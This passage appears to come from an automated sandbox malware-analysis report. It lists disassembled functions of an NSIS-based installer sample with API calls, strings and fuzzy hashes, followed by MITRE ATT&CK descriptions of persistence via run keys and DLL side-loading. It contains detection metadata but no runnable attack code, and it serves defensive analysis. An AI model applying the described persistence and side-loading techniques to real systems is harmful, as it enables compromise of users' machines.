CharNextW.USER32(?,00000000,00437800,00437800,00435000,00403480,00437800,756F3420,004036EF,?,00000006,00000008,0000000A), ref: 004066F3
CharPrevW.USER32(?,?,00437800,00437800,00435000,00403480,00437800,756F3420,004036EF,?,00000006,00000008,0000000A), ref: 00406706

Strings

*?|<>/":, xrefs: 004066CE

Memory Dump Source

Source File: 00000002.00000002.3772010021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3771983133.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3772041979.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3772071790.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3772106931.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ix8kxoBHDb.jbxd

Similarity

API ID: Char$Next$Prev
String ID: *?|<>/":
API String ID: 589700163-165019052
Opcode ID: 6f1dc59467bf7cdf849013f1baa50d92fe1cb62039c7f0915d7e3466f5f67e46
Instruction ID: ccb021e8c97aa0e4e9f296cc8cc4b0d2e06c32826977e33acd3911ee1a404cd3
Opcode Fuzzy Hash: 6f1dc59467bf7cdf849013f1baa50d92fe1cb62039c7f0915d7e3466f5f67e46
Instruction Fuzzy Hash: E011C82580061295DB302B548C44B77A2E8EF55764F52843FE985B32C1EB7D5CE28ABD

Function 0040176F Relevance: 7.6, APIs: 5, Instructions: 145stringtimeCOMMON

Download Yara Rule

APIs

lstrcatW.KERNEL32(00000000,00000000,0040A5D8,00436000,?,?,00000031), ref: 004017B0
CompareFileTime.KERNEL32(-00000014,?,0040A5D8,0040A5D8,00000000,00000000,0040A5D8,00436000,?,?,00000031), ref: 004017D5

Part of subcall function 004063E8: lstrcpynW.KERNEL32(?,?,00000400,00403576,00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 004063F5

Part of subcall function 00405450: lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
Part of subcall function 00405450: lstrlenW.KERNEL32(00402F08,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
Part of subcall function 00405450: lstrcatW.KERNEL32(00422708,00402F08,00402F08,00422708,00000000,00000000,00000000), ref: 004054AB
Part of subcall function 00405450: SetWindowTextW.USER32(00422708,00422708), ref: 004054BD
Part of subcall function 00405450: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
Part of subcall function 00405450: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
Part of subcall function 00405450: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B

Memory Dump Source

Source File: 00000002.00000002.3772010021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3771983133.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3772041979.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3772071790.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3772106931.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ix8kxoBHDb.jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID:
API String ID: 1941528284-0
Opcode ID: 55b9c7873fef6a42146c5bba3a7473b4437248d5263e1ddde9fdc16840247bc8
Instruction ID: 2530360bafa170a9d5e8074bf3c3c5079485a484cad24ccb9f0485aee5561d29
Opcode Fuzzy Hash: 55b9c7873fef6a42146c5bba3a7473b4437248d5263e1ddde9fdc16840247bc8
Instruction Fuzzy Hash: FF41C671900614BADF11ABA5CD85DAF3679EF05329B20433BF412B10E2CB3C86529A6E

Function 00401DB9 Relevance: 7.5, APIs: 5, Instructions: 43COMMON

Download Yara Rule

APIs

GetDC.USER32(?), ref: 00401DBC
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DD6
MulDiv.KERNEL32(00000000,00000000), ref: 00401DDE
ReleaseDC.USER32(?,00000000), ref: 00401DEF
CreateFontIndirectW.GDI32(0040CDD8), ref: 00401E3E

Memory Dump Source

Source File: 00000002.00000002.3772010021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3771983133.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3772041979.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3772071790.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3772106931.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ix8kxoBHDb.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectRelease
String ID:
API String ID: 3808545654-0
Opcode ID: e24a725036941366799e1b60f9567993ca488f5885cb4975d99fb3ecb50d70e9
Instruction ID: 863f18fc6204ba506076eb1f746ada73c94881a68b515e1873f2d1072bd1cf43
Opcode Fuzzy Hash: e24a725036941366799e1b60f9567993ca488f5885cb4975d99fb3ecb50d70e9
Instruction Fuzzy Hash: 15017171944240EFE701ABB4AF8ABD97FB4AF55301F10457EE242F61E2CA7804459F2D

Function 00401D5D Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 00401D63
GetClientRect.USER32(00000000,?), ref: 00401D70
LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D91
SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D9F
DeleteObject.GDI32(00000000), ref: 00401DAE

Memory Dump Source

Source File: 00000002.00000002.3772010021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3771983133.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3772041979.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3772071790.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3772106931.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ix8kxoBHDb.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: cecd7757bc9d55480b756717b9ac07822063c1f28e7ac406cf665e6dd60447a2
Instruction ID: 8bbc6a183a468c813578a114873fb97f9d5ca0b11dae6a70aa3aa56fe52826a6
Opcode Fuzzy Hash: cecd7757bc9d55480b756717b9ac07822063c1f28e7ac406cf665e6dd60447a2
Instruction Fuzzy Hash: 4BF0FF72A04518AFDB01DBE4DF88CEEB7BCEB48301B14047AF641F61A0CA749D519B38

Function 00401C1F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C8F
SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CA7

Strings

!, xrefs: 00401C5B

Memory Dump Source

Source File: 00000002.00000002.3772010021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3771983133.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3772041979.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3772071790.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3772106931.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ix8kxoBHDb.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: 204806375d4f16312a37781d02af86e184349cdc68ded53cac09897120414cdc
Instruction ID: ef61c68cd4a6cc3a6f3726d4b558d534156d03c1c75d5f5b51cfe904c604fa23
Opcode Fuzzy Hash: 204806375d4f16312a37781d02af86e184349cdc68ded53cac09897120414cdc
Instruction Fuzzy Hash: A621B471948209AEEF049FA5DA4AABD7BB4EB44304F14443EF605B61D0D7B845409B18

Function 00402D44 Relevance: 6.1, APIs: 4, Instructions: 63registryCOMMON

Download Yara Rule

APIs

RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402DA9
RegCloseKey.ADVAPI32(?,?,?), ref: 00402DB2
RegCloseKey.ADVAPI32(?,?,?), ref: 00402DD3

Memory Dump Source

Source File: 00000002.00000002.3772010021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3771983133.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3772041979.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3772071790.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3772106931.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ix8kxoBHDb.jbxd

Similarity

API ID: Close$Enum
String ID:
API String ID: 464197530-0
Opcode ID: 1fd681a58c600dee98d7f7e5161f1cc79c94fe5fc9469311f060f0f5731105c3
Instruction ID: 3410daaf41eb2a8de7896e1fb7aa518538b3e031ab7f3cb45a1fbd23233d04dd
Opcode Fuzzy Hash: 1fd681a58c600dee98d7f7e5161f1cc79c94fe5fc9469311f060f0f5731105c3
Instruction Fuzzy Hash: CE116A32500108FBDF12AB90CE09FEE7B7DAF44350F100076B905B61E0E7B59E21AB58

Function 0040591F Relevance: 6.0, APIs: 4, Instructions: 39COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNEL32(?,?,00000000), ref: 00405962
GetLastError.KERNEL32 ref: 00405976
SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 0040598B
GetLastError.KERNEL32 ref: 00405995

Memory Dump Source

Source File: 00000002.00000002.3772010021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3771983133.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3772041979.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3772071790.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3772106931.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ix8kxoBHDb.jbxd

Similarity

API ID: ErrorLast$CreateDirectoryFileSecurity
String ID:
API String ID: 3449924974-0
Opcode ID: c15d26eb0fd7dc0754592b558b3576eabd9f17effa54cf70e09af9e442894ad1
Instruction ID: ca5323325ecea66cc3de0aafa4d6cbc44a00468c8660a14113972894dcb98988
Opcode Fuzzy Hash: c15d26eb0fd7dc0754592b558b3576eabd9f17effa54cf70e09af9e442894ad1
Instruction Fuzzy Hash: 970108B1C10219DADF009FA5C944BEFBFB4EB14314F00403AE544B6290DB789608CFA9

Function 00405DC5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47stringCOMMON

Download Yara Rule

APIs

Part of subcall function 004063E8: lstrcpynW.KERNEL32(?,?,00000400,00403576,00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 004063F5

Part of subcall function 00405D68: CharNextW.USER32(?,?,00425F30,?,00405DDC,00425F30,00425F30,00437800,?,756F2EE0,00405B1A,?,00437800,756F2EE0,00000000), ref: 00405D76
Part of subcall function 00405D68: CharNextW.USER32(00000000), ref: 00405D7B
Part of subcall function 00405D68: CharNextW.USER32(00000000), ref: 00405D93

lstrlenW.KERNEL32(00425F30,00000000,00425F30,00425F30,00437800,?,756F2EE0,00405B1A,?,00437800,756F2EE0,00000000), ref: 00405E1E
GetFileAttributesW.KERNEL32(00425F30,00425F30,00425F30,00425F30,00425F30,00425F30,00000000,00425F30,00425F30,00437800,?,756F2EE0,00405B1A,?,00437800,756F2EE0), ref: 00405E2E

Strings

0_B, xrefs: 00405DCB

Memory Dump Source

Source File: 00000002.00000002.3772010021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3771983133.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3772041979.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3772071790.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3772106931.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ix8kxoBHDb.jbxd

Similarity

API ID: CharNext$AttributesFilelstrcpynlstrlen
String ID: 0_B
API String ID: 3248276644-2128305573
Opcode ID: df6e64e4f6769b316d4c1c7beb25aaa03b2c49ca2ab4503c480f7fe4b4eab687
Instruction ID: e2ef3bf648e1011fa726b67e088789f036b8871ba300d86fb9c867912b04298b
Opcode Fuzzy Hash: df6e64e4f6769b316d4c1c7beb25aaa03b2c49ca2ab4503c480f7fe4b4eab687
Instruction Fuzzy Hash: B4F0F439109E5116D62233365D09BEF0548CF82354B5A853BFC91B22D2DB3C8A539DFE

Function 004053C4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 004053F3
CallWindowProcW.USER32(?,?,?,?), ref: 00405444

Part of subcall function 004043AB: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004043BD

Strings

, xrefs: 004053D4

Memory Dump Source

Source File: 00000002.00000002.3772010021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3771983133.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3772041979.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3772071790.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3772106931.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ix8kxoBHDb.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: 36caebe1fe8aa1eff7ff321662443c514d6827d4f2801b7b393fcb4226acda68
Instruction ID: 343f6187318c33bb175646012d6cb398530476c6c15fe8dd96994d534b9a6b17
Opcode Fuzzy Hash: 36caebe1fe8aa1eff7ff321662443c514d6827d4f2801b7b393fcb4226acda68
Instruction Fuzzy Hash: CC0171B1200609ABDF305F11DD84B9B3666EBD4356F508037FA00761E1C77A8DD29A6E

Function 00405F0D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00405F2B
GetTempFileNameW.KERNEL32(?,?,00000000,?,?,?,00435000,004034A3,00437000,00437800,00437800,00437800,00437800,00437800,756F3420,004036EF), ref: 00405F46

Strings

nsa, xrefs: 00405F1A

Memory Dump Source

Source File: 00000002.00000002.3772010021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3771983133.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3772041979.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3772071790.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3772106931.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ix8kxoBHDb.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: nsa
API String ID: 1716503409-2209301699
Opcode ID: 0c62091ad8b50aef506abc269e58e4a43f33256201187c1c154fac6de66d8f01
Instruction ID: 076564571966e4dc9ef4834731be4d502634ae0aeddccfca5b4533d1bab5a213
Opcode Fuzzy Hash: 0c62091ad8b50aef506abc269e58e4a43f33256201187c1c154fac6de66d8f01
Instruction Fuzzy Hash: 14F09076601204FFEB009F59ED05E9BB7A8EB95750F10803AEE00F7250E6B49A548B68

Function 004059D1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00426730,Error launching installer), ref: 004059FA
CloseHandle.KERNEL32(?), ref: 00405A07

Strings

Error launching installer, xrefs: 004059E4

Memory Dump Source

Source File: 00000002.00000002.3772010021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3771983133.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3772041979.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3772071790.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3772106931.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ix8kxoBHDb.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: Error launching installer
API String ID: 3712363035-66219284
Opcode ID: 6d78ed6c6b667bfe634139d4e18f22187190c1a967eebebbcf2d401a0833c7e8
Instruction ID: 166b032e71181ba573d10d742cd21a74b10ba840f41c43b266edefbe5b435367
Opcode Fuzzy Hash: 6d78ed6c6b667bfe634139d4e18f22187190c1a967eebebbcf2d401a0833c7e8
Instruction Fuzzy Hash: E5E04FB0A102097FEB009B64ED49F7B76ACFB04208F404531BD00F2150D774A8208A7C

Function 00406F27 Relevance: 5.2, APIs: 4, Instructions: 236COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3772010021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3771983133.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3772041979.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3772071790.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3772106931.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ix8kxoBHDb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: db40346bc9fd20083a39152eff8b5ac78f5cdc0ebc59631a5c9ad52422038ace
Instruction ID: 2bd06e12bed6e0bcd81d630d0cd78bd49004ac77cb8b5ebb757de7108a839e92
Opcode Fuzzy Hash: db40346bc9fd20083a39152eff8b5ac78f5cdc0ebc59631a5c9ad52422038ace
Instruction Fuzzy Hash: 1DA14471E04228CBDF28CFA8C8446ADBBB1FF44305F14806ED856BB281D7786A86DF45

Function 00407128 Relevance: 5.2, APIs: 4, Instructions: 208COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3772010021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3771983133.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3772041979.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3772071790.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3772106931.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ix8kxoBHDb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9d32937a43efcd2dea5d1fc698e3fcc0023127280f8acdc5c544d8c7d1790a46
Instruction ID: f1da02a2f8b93330a3d469e31e6e9edf047fa596270f1f1d86c95cc791e20b04
Opcode Fuzzy Hash: 9d32937a43efcd2dea5d1fc698e3fcc0023127280f8acdc5c544d8c7d1790a46
Instruction Fuzzy Hash: AA910271E04228CBEF28CF98C8447ADBBB1FB45305F14816AD856BB291C778A986DF45

Function 00406E3E Relevance: 5.2, APIs: 4, Instructions: 205COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3772010021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3771983133.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3772041979.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3772071790.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3772106931.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ix8kxoBHDb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67d6f810e310069c411d265ffcddf6abea8090fb20e8d2db1667143610fe5bd5
Instruction ID: fb1d02f26201205f5bfcbd3029eb7cfad7cca69a3f8c46de7b35964bdd0c3f7d
Opcode Fuzzy Hash: 67d6f810e310069c411d265ffcddf6abea8090fb20e8d2db1667143610fe5bd5
Instruction Fuzzy Hash: 18814571E04228DFDF24CFA8C844BADBBB1FB45305F24816AD856BB291C7389986DF45

Function 00406943 Relevance: 5.2, APIs: 4, Instructions: 198COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3772010021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3771983133.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3772041979.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3772071790.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3772106931.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ix8kxoBHDb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5328a0701a0a32b67c374057837e60552721ea1a6811a44abe83e42546375677
Instruction ID: 55fc176551b00f8465723d30588461dcf2fc1d3195b414c524ee7a2fcbdbe87b
Opcode Fuzzy Hash: 5328a0701a0a32b67c374057837e60552721ea1a6811a44abe83e42546375677
Instruction Fuzzy Hash: 39815971E04228DBEF24CFA8C844BADBBB1FB45305F14816AD856BB2C1C7786986DF45

Function 00406D91 Relevance: 5.2, APIs: 4, Instructions: 180COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3772010021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3771983133.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3772041979.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3772071790.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3772106931.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ix8kxoBHDb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a445a859154d96951751bba7131c1a69e0b73c0895ac35a4e96b2d7ee743491b
Instruction ID: 7645ab34ef40ba223d211dbe726f8302725d3f31b3e808d93cc70016d3e0d248
Opcode Fuzzy Hash: a445a859154d96951751bba7131c1a69e0b73c0895ac35a4e96b2d7ee743491b
Instruction Fuzzy Hash: 10711471E04228DBDF24CF98C8447ADBBB1FF49305F15806AD856BB281C7389A86DF45

Function 00406EAF Relevance: 5.2, APIs: 4, Instructions: 170COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3772010021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3771983133.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3772041979.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3772071790.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3772106931.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ix8kxoBHDb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd7d90a79d0f10410712768d5bba8e0713d9e8f593557aa9bf16db43d4616d0f
Instruction ID: a4e19b7408f2815589132e7e2b866ae2b9c8caa40868d81b8a4623295251dea3
Opcode Fuzzy Hash: cd7d90a79d0f10410712768d5bba8e0713d9e8f593557aa9bf16db43d4616d0f
Instruction Fuzzy Hash: 0D712571E04218DBEF28CF98C844BADBBB1FF45305F15806AD856BB281C7389986DF45

Function 00406DFB Relevance: 5.2, APIs: 4, Instructions: 168COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3772010021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3771983133.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3772041979.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3772071790.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3772106931.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ix8kxoBHDb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 08b8d2b65a0c1c30b5e83c7ea62cdb0658c0fab8542c410d93f606ef21acc8e7
Instruction ID: 979076adb26e5f1e3e7a9458f232081f51f9a0722543042d1d726f4d31452a21
Opcode Fuzzy Hash: 08b8d2b65a0c1c30b5e83c7ea62cdb0658c0fab8542c410d93f606ef21acc8e7
Instruction Fuzzy Hash: 50714871E04228DBEF28CF98C8447ADBBB1FF45305F15806AD856BB281C7386A46DF45

Function 00405E43 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E53
lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405E6B
CharNextA.USER32(00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E7C
lstrlenA.KERNEL32(00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E85

Memory Dump Source

Source File: 00000002.00000002.3772010021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3771983133.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3772041979.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3772071790.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3772106931.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ix8kxoBHDb.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: 7e71a0af936693ae9f9191b5a8beeb80aa55241a483ed2e2c495a4152d25f7df
Instruction ID: 3eb9f18af2c16f81f4dc7877ab3147293eaebe45f2d41041cd024b5e05e36bdf
Opcode Fuzzy Hash: 7e71a0af936693ae9f9191b5a8beeb80aa55241a483ed2e2c495a4152d25f7df
Instruction Fuzzy Hash: 4AF0C831100514AFC7029B94DD4099FBBA8DF06354B25407AE844FB211D634DF01AB98

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
